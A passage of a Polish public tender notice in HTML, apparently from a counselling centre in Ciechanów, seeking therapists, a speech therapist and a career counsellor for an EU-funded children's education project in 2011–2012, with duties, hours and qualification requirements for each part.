5.	Przeprowadzenie   diagnozy  końcowej testem psychologicznym FROSTIG  - 1 godzina na każde dziecko.
6.	Osiągnięcie wymaganych rezultatów poprzez ukończenie zajęć przez 12 dzieci, w tym 4 dziewczęta.
7.	Osiągnięcie wymaganych rezultatów poprzez zwiększenie sprawności koordynacji wzrokowo- ruchowej oraz orientacji w stosunkach przestrzennych u 70 % objętych zajęciami i udokumentowanie tego faktu.
8.	Bieżące prowadzenie  Dziennika zajęć i  odnotowywanie w Dzienniku informacji dot. postępów dzieci.
9.	Każdorazowe potwierdzanie obecności dziecka na zajęciach podpisem rodzica na liście obecności.
10.	Opracowanie programu pracy z każdą grupą.
11.	Dokonanie analizy porównawczej diagnoz /sprawdzianów początkowych i końcowych/ i przedstawienie ich w formie pisemnej nie później niż 4 dni od zakończeniu zajęć
12.	Współpraca z kadrą projektu
13.	Prowadzenie karty pracy i innych niezbędnych dokumentów związanych z realizacją projektu.
14.	Informowanie o finansowaniu realizacji projektu przez Unię Europejską poprzez zamieszczenie w dokumentacji zespołu informacji o udziale Unii Europejskiej, a także oznakowania miejsca realizacji, zgodnie z wymogami Rozporządzenia Rady (WE) nr 1083/2006 z dnia 11 lipca 2006 r. ustanawiającego przepisy ogólne dotyczące Europejskiego Funduszu Rozwoju Regionalnego, Europejskiego Funduszu Społecznego oraz Funduszu Spójności (Dz. Urz. UE L 210/25 z 31.07.2006) oraz rozporządzeniem Komisji WE nr 1828/2006 ustanawiającego szczegółowe zasady wykonania Rozporządzenia Rady WE nr1083/2006 (Dz. Urz. UE L 371/1 z 27.12.2006) i  wytycznymi dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki 2007 - 2013.
15.	Przekazanie Zamawiającemu, w terminie do 5 dni od dnia zakończenia realizacji  zadania pełnej dokumentacji z przeprowadzonych zajęć.
16.	Przechowywanie dokumentów potwierdzających realizację przedmiotowych zajęć. 

Wymagania stawiane przez Zamawiającego  Wykonawcy zamówienia publicznego:
1.Wykształcenie: wyższe magisterskie na kierunku psychologia z przygotowaniem pedagogicznym.
2.	Minimum 2-letnie doświadczenie w pracy z dziećmi. 
3.	Minimum 2- letnie doświadczenie w dokonywaniu diagnozy dzieci i programowaniu pracy w oparciu o dokonaną diagnozę.
4.	Umiejętność stosowania testu FROSTIG
5.	Znajomość programu Frostig- Horn usprawniającego percepcję wzrokową.
6.	Umiejętność dokonywania ewaluacji prowadzonych zajęć..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.41.00.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający na podstawie przedłożonych dokumentów i oświadczeń dokona oceny spełnienia warunków określonych  w art. 22 ust.1  ustawy Prawo zamówień publicznych metodą spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający na podstawie przedłożonych dokumentów i oświadczeń dokona oceny spełnienia warunków określonych  w art. 22 ust.1  ustawy Prawo zamówień publicznych metodą spełnia - nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://stciechanow.bip.org.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> jak w pkt I.1).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.10.2011 godzina 10:00, miejsce: Poradnia Psychologiczno-Pedagogiczna w Ciechanowie, 06-400 Ciechanów, ul. Wyzwolenia 10 A-Sekretariat, pokój nr 201, II piętro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt Poradnia równych szans współfinansowanego ze środków  Europejskiego Funduszu Społecznego - Program Operacyjny  Kapitał Ludzki Priorytet IX. Rozwój wykształcenia i kompetencji w regionach,  DZIAŁANIE  9.1 Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty PODDZIAŁANIE  9.1.2  Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszenie różnic w jakości usług edukacyjnych ..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Współprowadzenie zajęć stymulujących dla uczniów klas II szkół podstawowych z terenu powiatu ciechanowskiego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Prowadzenie przez dwóch terapeutów zajęć  stymulujących  dla uczniów z klas II szkół podstawowych z terenu powiatu ciechanowskiego  w ramach projektu Poradnia równych szans współfinansowanego ze środków  Europejskiego Funduszu Społecznego - Program Operacyjny  Kapitał Ludzki Priorytet IX. Rozwój wykształcenia i kompetencji w regionach,  DZIAŁANIE  9.1 Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty PODDZIAŁANIE  9.1.2  Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszenie różnic w jakości usług edukacyjnych .

Termin realizacji - od czasu podpisania umowy do 30.06.2012 r. 
Ilość godzin (dla jednego terapeuty): łącznie - 68 godzin , w tym:
- spotkanie dla rodziców (wstępne): 1 godzina 
- diagnoza wstępna (4 dzieci)= 8 godzin
- współprowadzenie zajęć stymulujących z dziećmi: 50 godzin, w tym 20 godzin do realizacji do  dnia 10 grudnia 2011r.
- diagnoza końcowa (4 dzieci) - 8 godzin
- spotkanie podsumowujące dla rodziców: 1godzina.
Realizacja zajęć na terenie Poradni Psychologiczno- Pedagogicznej w Ciechanowie w terminach ustalonych z rodzicami i uczestnikami zajęć oraz w godzinach, które nie kolidują i nie dezorganizują  pracy Poradni. Zadania mają być realizowane od poniedziałku do piątku  (z wyłączeniem sobót i niedziel)  1-2 razy w tygodniu w godzinach popołudniowych (14.00- 18.00) zgodnie z ustalonym wcześniej harmonogramem.

Do Wykonawców zamówienia publicznego należy :
1)	Zorganizowanie i współprowadzenie zajęć stymulujących dla uczniów klas II szkoły podstawowej dla 8 osobowej grupy dzieci.
2)	Prowadzenie czynności związanych z rekrutacją do projektu poprzez nawiązanie kontaktów ze szkołami, rozmowy osobiste i telefoniczne z rodzicami, zebranie od rodziców Ankiet rekrutacyjnych, niezbędnych oświadczeń oraz umów o udziale w projekcie 
3)	Zorganizowanie i współprowadzenie spotkania wstępnego, informacyjnego 
dla rodziców.
4)	Zebranie od rodziców dzieci objętych zadaniem wszystkich niezbędnych dokumentów, oświadczeń i deklaracji.
5)	Opracowanie wspólnie z drugim terapeutą narzędzi do diagnozy rezultatów określonych w pkt. 10.
6)	Przeprowadzenie indywidualnej wstępnej diagnozy 4 dzieci zakwalifikowanych 
do udziału w zajęciach w oparciu o opracowane przez siebie narzędzia diagnostyczne pozwalające na  ocenę wymaganych rezultatów opisanych w pkt. 10 (2 godziny  na dziecko)
7)	Współprowadzenie  25  zajęć po 2 godziny - przez każdego z terapeutów. 
8)	Przeprowadzenie diagnozy końcowej (oceny postępów) w oparciu o opracowane przez siebie narzędzia diagnostyczne pozwalające na  ocenę wymaganych rezultatów opisanych w pkt. 10 - indywidualnej dla 4 dzieci (2 godziny  na dziecko)
9)	Zorganizowanie i współprowadzenie spotkania podsumowującego dla rodziców
10)	Osiągnięcie wymaganych rezultatów poprzez ukończenie zajęć przez 8 dzieci, w tym 4 dziewcząt.
11)	Osiągnięcie wymaganego rezultatu u minimum 50% dzieci objętych zajęciami polegającego na zwiększeniu sprawności funkcji percepcyjno- motorycznych, poprawie orientacji w schemacie ciała i w przestrzeni, poprawie zdolności operacyjnego rozumowania
12)	Prowadzenie listy obecności dla rodziców uczestniczących w spotkaniach z rodzicami
13)	Bieżące prowadzenie Dziennika zajęć, odnotowywanie w Dzienniku informacji dot. postępów dzieci.
14)	Każdorazowe potwierdzanie obecności dziecka na zajęciach podpisem rodzica na liście obecności.
15)	Opracowanie programu pracy z grupą.
16)	Dokonanie analizy porównawczej diagnoz początkowych i końcowych oraz przedstawienie ich w formie pisemnej nie później niż w ciągu 4 dni od zakończenia zajęć
17)	Współpraca z kadrą projektu
18)	Prowadzenie karty pracy i innych niezbędnych dokumentów związanych z realizacją projektu
19)	Informowanie o finansowaniu realizacji projektu przez Unię Europejską poprzez zamieszczenie w dokumentacji zespołu informacji o udziale Unii Europejskiej, a także oznakowania miejsca realizacji, zgodnie z wymogami Rozporządzenia Rady (WE) nr 1083/2006 z dnia 11 lipca 2006 r. ustanawiającego przepisy ogólne dotyczące Europejskiego Funduszu Rozwoju Regionalnego, Europejskiego Funduszu Społecznego oraz Funduszu Spójności (Dz. Urz. UE L 210/25 z 31.07.2006) oraz rozporządzeniem Komisji WE nr 1828/2006 ustanawiającego szczegółowe zasady wykonania Rozporządzenia Rady WE nr1083/2006 (Dz. Urz. UE L 371/1 z 27.12.2006) i  wytycznymi dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki 2007 - 2013.
20)	Przekazanie Zamawiającemu, w terminie do 5 dni od dnia zakończenia realizacji  zadania pełnej dokumentacji z przeprowadzonych zajęć.
21)	Przechowywanie dokumentów potwierdzających realizację przedmiotowych zajęć. 

Wymagania stawiane przez Zamawiającego  Wykonawcom:
1.	Wykształcenie: wyższe magisterskie na kierunku pedagogika lub psychologia 
z przygotowaniem pedagogicznym.
2.	Minimum 2-letnie doświadczenie w pracy z dziećmi 
3.	Minimum 2- letnie doświadczenie w dokonywaniu diagnozy dzieci i programowaniu pracy w oparciu o dokonaną diagnozę.
4.	Umiejętność dokonywania ewaluacji prowadzonych zajęć..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.41.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zorganizowania i prowadzenia zajęć z zakresu doradztwa zawodowego Moja przyszłość dla gimnazjalistów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zorganizowanie i przeprowadzenie przez doradcę zawodowego zajęć  zakresu doradztwa zawodowego Moja przyszłość dla gimnazjalistów  w ramach projektu Poradnia równych szans współfinansowanego ze środków  Europejskiego Funduszu Społecznego - Program Operacyjny  Kapitał Ludzki Priorytet IX. Rozwój wykształcenia i kompetencji w regionach,  DZIAŁANIE  9.1 Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty PODDZIAŁANIE  9.1.2  Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszenie różnic w jakości usług edukacyjnych .

Termin realizacji - od podpisania umowy do 30.05.2012 r. 
Ilość godzin- łącznie 58  godzin, w tym:
- poprowadzenie 8 spotkań dla rodziców (po 1,5 godziny każde) = 12 godzin , w tym                   3 spotkania  w 2011r.
przeprowadzenie zajęć z młodzieżą na terenie gimnazjów powiatu ciechanowskiego: 46godzin , w tym 16 godzin  w 2011r.

Realizacja zadania na terenie gimnazjów w powiecie ciechanowskim, w terminach i godzinach ustalonych z dyrektorami szkół.

Do Wykonawcy  zamówienia publicznego  - doradcy zawodowego należy: 
1) Przeprowadzenie rozmów z dyrektorami szkół i ustalenie we współpracy 
z dyrektorami harmonogramu realizacji zajęć.
2)	Prowadzenie czynności związanych z rekrutacją do projektu poprzez nawiązanie kontaktów ze szkołami, rozmowy osobiste i telefoniczne z rodzicami, zebranie od rodziców Ankiet rekrutacyjnych, niezbędnych oświadczeń oraz umów o udziale w projekcie 
3)	Opracowanie programu zajęć dla młodzieży.
4)	Zorganizowanie dla 8 grup rodziców spotkań informacyjnych.
5)	Zebranie od rodziców dzieci objętych zadaniem wszystkich niezbędnych dokumentów, oświadczeń i deklaracji.
6)	Przeprowadzenie zajęć w 23 grupach uczniów i zapewnienie uczestnictwa 410 dzieci w zajęciach (w tym minimum 202 uczennic )
7)	Osiągnięcie wymaganych rezultatów poprzez wzrost umiejętności poznania swoich predyspozycji zawodowych oraz umiejętności pomocnych przy wyborze szkoły 
u 45 % objętych zadaniem, w tym u 45% dziewcząt i wykazanie ich w formie pisemnej.  
8)	Prowadzenie list obecności dla uczestników zajęć.
9)	Każdorazowe zbieranie list obecności podpisanych przez gimnazjalistów - uczestniczących w zajęciach
10)	Opracowanie ankiet dla uczestników zajęć pozwalających na określenie stopnia osiągnięcia rezultatów opisanych w pkt. 7.
11)	Przeprowadzenie ankiet  wśród uczestników pozwalających na ocenę stopnia osiągnięcia rezultatów określonych w pkt. 7.
12)	Prowadzenie listy obecności dla rodziców uczestniczących w spotkaniach z rodzicami.
13)	Promowanie projektu w trakcie spotkań z rodzicami.
14)	Opracowanie prezentacji multimedialnej wykorzystywanej w trakcie realizacji zajęć i przedłożenie do dokumentacji projektu spełniającej wymagania określone w pkt. 7 i 17. 
15)	Współpraca z kadrą projektu.
16)	Prowadzenie karty pracy i innych niezbędnych dokumentów związanych z realizacją projektu.
17)	Informowanie o finansowaniu realizacji projektu przez Unię Europejską poprzez zamieszczenie w dokumentacji zespołu informacji o udziale Unii Europejskiej, a także oznakowania miejsca realizacji, zgodnie z wymogami Rozporządzenia Rady (WE) nr 1083/2006 z dnia 11 lipca 2006 r. ustanawiającego przepisy ogólne dotyczące Europejskiego Funduszu Rozwoju Regionalnego, Europejskiego Funduszu Społecznego oraz Funduszu Spójności (Dz. Urz. UE L 210/25 z 31.07.2006) oraz rozporządzeniem Komisji WE nr 1828/2006 ustanawiającego szczegółowe zasady wykonania Rozporządzenia Rady WE nr1083/2006 (Dz. Urz. UE L 371/1 z 27.12.2006) i  wytycznymi dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki 2007 - 2013.
18)	Przekazanie Zamawiającemu, w terminie do 5 dni od dnia zakończenia realizacji  zadania pełnej dokumentacji z przeprowadzonych zajęć.
19)	Przechowywanie dokumentów potwierdzających realizację przedmiotowych zajęć.

Wymagania stawiane przez Zamawiającego  Wykonawcom:
1.	Wykształcenie: wyższe magisterskie na kierunku pedagogika lub psychologia 
z przygotowaniem pedagogicznym.
2.	Posiadanie kwalifikacji w zakresie doradztwa zawodowego.
3.	Minimum 2-letnie doświadczenie w pracy z dziećmi. 
4.	Minimum 2- letnie doświadczenie w zakresie doradztwa  zawodowego.
5.	Umiejętność dokonywania ewaluacji prowadzonych zajęć..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.41.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.05.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zorganizowanie i prowadzenie zajęć stymulujących gotowość szkolną dla dzieci z klas O z terenu powiatu ciechanowskiego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zorganizowanie i przeprowadzenie przez dwóch terapeutów zajęć  stymulujących  gotowość szkolną dla dzieci z klas 0 z terenu powiatu ciechanowskiego  w ramach projektu Poradnia równych szans współfinansowanego ze środków  Europejskiego Funduszu Społecznego - Program Operacyjny  Kapitał Ludzki Priorytet IX. Rozwój wykształcenia i kompetencji w regionach,  DZIAŁANIE  9.1 Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty PODDZIAŁANIE  9.1.2  Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszenie różnic w jakości usług edukacyjnych .

Termin realizacji - 01.01.2012 r.  do 30.06.2012 r. 
Ilość godzin dla jednego terapeuty- łącznie 29 godzin, w tym:
- zorganizowanie i współprowadzenie spotkania organizacyjnego dla rodziców: 1godzina
- poprowadzenie zajęć dla dzieci- 26 godzin
- zorganizowanie i współprowadzenie spotkania podsumowującego dla rodziców: 2 godziny
Realizacja zajęć na terenie Poradni Psychologiczno- Pedagogicznej w Ciechanowie w terminach ustalonych z rodzicami i uczestnikami zajęć oraz w godzinach, które nie kolidują i nie dezorganizują  pracy Poradni. Zadania mają być realizowane od poniedziałku do piątku  (z wyłączeniem sobót i niedziel)  1-2 razy w tygodniu w godzinach popołudniowych (14.00- 18.00) zgodnie z ustalonym wcześniej harmonogramem.

Do Wykonawców zamówienia publicznego należy :
1)	Zorganizowanie i prowadzenie zajęć dla 8 osobowej grupy dzieci po 13 godzin zajęć  w grupach 2- osobowych.
2)	Prowadzenie czynności związanych z rekrutacją do projektu poprzez nawiązanie kontaktów ze szkołami, rozmowy osobiste i telefoniczne z rodzicami, zebranie od rodziców Ankiet rekrutacyjnych, niezbędnych oświadczeń oraz umów o udziale w projekcie Zorganizowanie spotkania wstępnego, informacyjnego dla rodziców.
3)	Zebranie od rodziców dzieci objętych zadaniem wszystkich niezbędnych dokumentów, oświadczeń i deklaracji.
4)	Poprowadzenie spotkania końcowego dla rodziców.
5)	Opracowanie we współpracy z drugim terapeutą narzędzi do diagnozy stopnia osiągnięcia rezultatów określonych w pkt. 8.
6)	 Zastosowanie co najmniej 2 razy (na początku i na końcu zajęć) opracowanych narzędzi do diagnozy stopnia osiągnięcia rezultatów opisanych w pkt. 8
7)	Osiągnięcie wymaganych rezultatów poprzez ukończenie zajęć przez 8 dzieci, w tym 4 dziewcząt.
8)	Osiągnięcie wymaganego rezultatu poprzez wzrost umiejętności wykorzystywania umiejętności intelektualnych w życiu u 50% dzieci objętych zajęciami oraz poprawa relacji z dorosłymi i rozwój zainteresowań u 25 % dzieci objętych zadaniem 
9)	Prowadzenie listy obecności dla rodziców uczestniczących w spotkaniach z rodzicami
10)	Bieżące prowadzenie  Dziennika zajęć, odnotowywanie w Dzienniku informacji dot.. postępów dzieci
11)	Każdorazowe potwierdzanie obecności dziecka na zajęciach podpisem rodzica na liście obecności.
12)	Opracowanie programu pracy z każdą 2- osobową grupą.
13)	Dokonanie analizy porównawczej diagnoz /sprawdzianów początkowych i końcowych i przedstawienie ich w formie pisemnej nie później niż 4 dni od zakończeniu zajęć.
14)	Współpraca z kadrą projektu.
15)	Prowadzenie karty pracy i innych niezbędnych dokumentów związanych z realizacją projektu.
16)	Informowanie o finansowaniu realizacji projektu przez Unię Europejską poprzez zamieszczenie w dokumentacji zespołu informacji o udziale Unii Europejskiej, a także oznakowania miejsca realizacji, zgodnie z wymogami Rozporządzenia Rady (WE) nr 1083/2006 z dnia 11 lipca 2006 r. ustanawiającego przepisy ogólne dotyczące Europejskiego Funduszu Rozwoju Regionalnego, Europejskiego Funduszu Społecznego oraz Funduszu Spójności (Dz. Urz. UE L 210/25 z 31.07.2006) oraz rozporządzeniem Komisji WE nr 1828/2006 ustanawiającego szczegółowe zasady wykonania Rozporządzenia Rady WE nr1083/2006 (Dz. Urz. UE L 371/1 z 27.12.2006) i  wytycznymi dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki 2007 - 2013.
17)	Przekazanie Zamawiającemu, w terminie do 5 dni od dnia zakończenia realizacji  zadania pełnej dokumentacji z przeprowadzonych zajęć.
18)	Przechowywanie dokumentów potwierdzających realizację przedmiotowych zajęć. 

Wymagania stawiane przez Zamawiającego  Wykonawcom:
1)	Wykształcenie: wyższe magisterskie na kierunku pedagogika lub psychologia 
z przygotowaniem pedagogicznym.
2)	Uprawnienia do pracy z dziećmi młodszymi (studia podyplomowe, kursy - minimum łącznie 100 godzin).
3)	Minimum 2-letnie doświadczenie w pracy z dziećmi.
4)	Minimum 2- letnie doświadczenie w pracy z dziećmi w wieku przedszkolnym.
5)	Umiejętność dokonywania ewaluacji prowadzonych zajęć.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.41.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2012.</p></li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zorganizowanie i prowadzenie terapii logopedycznej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zorganizowanie i przeprowadzenie przez terapeutę  terapii logopedycznej dla 8-ga dzieci   w ramach projektu Poradnia równych szans współfinansowanego ze środków  Europejskiego Funduszu Społecznego - Program Operacyjny  Kapitał Ludzki Priorytet IX. Rozwój wykształcenia i kompetencji w regionach,  DZIAŁANIE  9.1 Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty PODDZIAŁANIE  9.1.2  Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszenie różnic w jakości usług edukacyjnych .
Termin realizacji: od podpisania umowy do 30 czerwca 2012 r.
Realizacja terapii logopedycznej przez 1 terapeutę w dwóch grupach:
1)	I grupa -   4 dzieci - od podpisania umowy do 31.01.2012 roku,
2)	II grupa - 4 dzieci - od 01.02.1012 do 30.06.2012 roku.
Ilość godzin w sumie dla 2 grup- 76 godzin, w tym:
- Dokonanie diagnozy wstępnej dzieci- 8godzin
- Poprowadzenie zajęć z dziećmi- 60 godzin
- Dokonanie diagnozy końcowej- 8godzin.

Realizacja zajęć na terenie Poradni Psychologiczno- Pedagogicznej w Ciechanowie w terminach ustalonych z rodzicami i uczestnikami zajęć oraz w godzinach, które nie kolidują i nie dezorganizują  pracy Poradni. Zadania mają być realizowane od poniedziałku do piątku  (z wyłączeniem sobót i niedziel)  1-2 razy w tygodniu w godzinach popołudniowych (14.00- 18.00) zgodnie z ustalonym wcześniej harmonogramem.

Do Wykonawcy zamówienia publicznego  należy:
1.	Zorganizowanie i przeprowadzenie zajęć indywidualnych dla 4 dzieci od podpisania umowy do 31.01. 2012 roku   i  dla 4 dzieci od 01.02.2012 r.  do 30.06. 2012 r.. 
2.	Prowadzenie czynności związanych z rekrutacją do projektu poprzez nawiązanie kontaktów ze szkołami, rozmowy osobiste i telefoniczne z rodzicami, zebranie od rodziców Ankiet rekrutacyjnych, niezbędnych oświadczeń oraz umów o udziale w projekcie 
3.	Zajęcia indywidualne obejmują  dla każdej z grup - 10 spotkań po 45 minut.
4.	Opracowanie  narzędzi do oceny/ diagnozy  umiejętności dziecka określonych w pkt. 8
5.	Przeprowadzenie diagnozy końcowej i początkowej wśród dzieci w oparciu o opracowane narzędzia diagnozy i udokumentowanie tego faktu.
6.	Zebranie od rodziców dzieci objętych zadaniem wszystkich niezbędnych dokumentów, oświadczeń i deklaracji
7.	Osiągnięcie wymaganych rezultatów poprzez ukończenie zajęć przez 8 dzieci, w tym 2 dziewcząt.
8.	Osiągnięcie wymaganych rezultatów poprzez poprawę w realizacji korygowanych głosek i w zakresie percepcji słuchowej u 75% dzieci.
9.	Bieżące prowadzenie  Dziennika zajęć, odnotowywanie w Dzienniku informacji dot. postępów dzieci.
10.	Każdorazowe potwierdzanie obecności dziecka na zajęciach podpisem rodzica na liście obecności.
11.	Opracowanie programu pracy z każdym dzieckiem
12.	Dokonanie analizy porównawczej diagnoz /sprawdzianów początkowych i końcowych/ i przedstawienie ich w formie pisemnej nie później niż 4 dni od zakończeniu zajęć.
13.	Współpraca z kadrą projektu
14.	Prowadzenie karty pracy i innych niezbędnych dokumentów związanych z realizacją projektu.
15.	Informowanie o finansowaniu realizacji projektu przez Unię Europejską poprzez zamieszczenie w dokumentacji zespołu informacji o udziale Unii Europejskiej, a także oznakowania miejsca realizacji, zgodnie z wymogami Rozporządzenia Rady (WE) nr 1083/2006 z dnia 11 lipca 2006 r. ustanawiającego przepisy ogólne dotyczące Europejskiego Funduszu Rozwoju Regionalnego, Europejskiego Funduszu Społecznego oraz Funduszu Spójności (Dz. Urz. UE L 210/25 z 31.07.2006) oraz rozporządzeniem Komisji WE nr 1828/2006 ustanawiającego szczegółowe zasady wykonania Rozporządzenia Rady WE nr1083/2006 (Dz. Urz. UE L 371/1 z 27.12.2006) i  wytycznymi dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki 2007 - 2013.
16.	Przekazanie Zamawiającemu, w terminie do 5 dni od dnia zakończenia realizacji  zadania pełnej dokumentacji z przeprowadzonych zajęć.
17.	Przechowywanie dokumentów potwierdzających realizację przedmiotowych zajęć. 

Wymagania stawiane przez Zamawiającego  Wykonawcom zamówienia publicznego:
a.	Wykształcenie: wyższe magisterskie na kierunku pedagogika lub psychologia 
z przygotowaniem pedagogicznym.
b.	Studia podyplomowe w zakresie logopedii lub kurs kwalifikacyjny w zakresie logopedii szkolnej.
c.	Minimum 2-letnie doświadczenie w pracy z dziećmi z wadami wymowy.
d.	Minimum 2- letnie doświadczenie w dokonywaniu diagnozy logopedycznej dzieci i programowaniu pracy w oparciu o dokonaną diagnozę. 
e.	Umiejętność dokonywania ewaluacji prowadzonych zajęć.</p></li>
